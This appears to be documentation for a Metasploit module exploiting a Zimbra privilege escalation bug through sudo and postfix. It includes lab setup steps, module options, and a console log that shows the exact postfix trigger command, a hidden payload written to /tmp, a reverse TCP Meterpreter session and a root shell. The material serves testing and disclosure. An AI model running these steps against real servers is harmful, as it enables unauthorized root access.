## Vulnerable Application Currently, as of 2022-10-14, all versions of Zimbra are vulnerable. Presumably they'll patch it eventually - I reported it to Zimbra. ### Install Zimbra My steps to install Zimbra (adapted from Christophe): Create a VM with the following specs: ``` HDD = 128gb Memory/etc don't matter ``` Install a local DNS server (note: replace `` with the host's actual ip) (other note: replace `apt` with `yum` to do this on a Red Hat-derived system): ``` sudo apt update && sudo apt install dnsmasq sudo hostnamectl set-hostname mail.example.org echo " mail.example.org" | sudo tee -a /etc/hosts echo -e 'listen-address=127.0.0.1\nserver=8.8.8.8\ndomain=example.org\nmx-host=example.org, mail.example.org, 5\nmx-host=mail.example.org, mail.example.org, 5' | sudo tee /etc/dnsmasq.conf ``` Configure the host to use it: ``` sudo systemctl disable systemd-resolved sudo systemctl stop systemd-resolved sudo killall dnsmasq # Seems to be required for Red Hat OSes sudo systemctl restart dnsmasq echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf ``` Download Zimbra from https://www.zimbra.com/downloads/zimbra-collaboration-open-source/ - you'll have to sell your soul and opt-in to spam, but they don't validate your email. ``` tar -xvvzf zcs-*.tgz cd zcs* sudo ./install.sh * Lots of * DO NOT install `dnscache` module (respond `N` when it ask), I had conflict issues with the local `dnsmasq` * Yes change the system * Setup the admin password, probably turn off auto-updates ``` ## Verification Steps Get a Meterpreter session on the Zimbra server as the `zimbra` user - I used `exploit/linux/http/zimbra_cpio_cve_2022_41352` but just running a Meterpreter binary is also fine. To become vulnerable to cve-2022-41352, just `rm $(which pax)` then reboot. From there, You can obviously get a shell however you like. :) Then: 1. Do: `use exploit/linux/local/zimbra_postfix_priv_esc` 1. Do: `set SESSION 1` 1. Do: `set RHOSTS ` 1. Do: `set LHOST ` 1. Do: `exploit` ## Options ### SUDO_PATH The path to `sudo` on the host. If we have a proper environment with `$PATH` set, which we generally do, simply `sudo` is fine. ### ZIMBRA_BASE The base where Zimbra is installed. Zimbra typically installs to `/opt/zimbra`, and I'm not even sure if it _can_ install elsewhere, so this default should be fine. ### WritableDir A directory where we can write the payload - by default, `/tmp`. ### PayloadFilename A specific filename to use as the payload, within `WritableDir`. By default, it's randomized (with a `.` in front) ## Scenarios ### Escalating a `zimbra` session to `root`, after exploiting cve-2022-41352 ``` msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/linux zimbra @ mail.example.org 172.16.166.147:4444 -> 172.16.166.157:47210 (172.16.166.157) msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > use exploit/linux/local/zimbra_postfix_priv_esc [*] Using configured payload linux/x64/meterpreter/reverse_tcp msf6 exploit(linux/local/zimbra_postfix_priv_esc) > set SESSION 1 SESSION => 1 msf6 exploit(linux/local/zimbra_postfix_priv_esc) > exploit [*] Started reverse TCP handler on 172.16.166.147:4444 [*] Running automatic check ("set AutoCheck false" to disable) [*] Sending stage (3045348 bytes) to 172.16.166.157 [*] Executing: sudo -n -l [+] The target appears to be vulnerable. [*] Creating exploit directory: /tmp/.GPjXSraCDY [*] Writing '/tmp/.GPjXSraCDY/.qjSY8' (250 bytes) ... [*] Attempting to trigger payload: sudo /opt/zimbra/common/sbin/postfix -D -v /tmp/.GPjXSraCDY/.qjSY8 [*] Sending stage (3045348 bytes) to 172.16.166.157 [+] Deleted /tmp/.GPjXSraCDY [*] Meterpreter session 5 opened (172.16.166.147:4444 -> 172.16.166.157:36488) at 2022-10-14 13:19:25 -0700 meterpreter > getuid Server username: root ```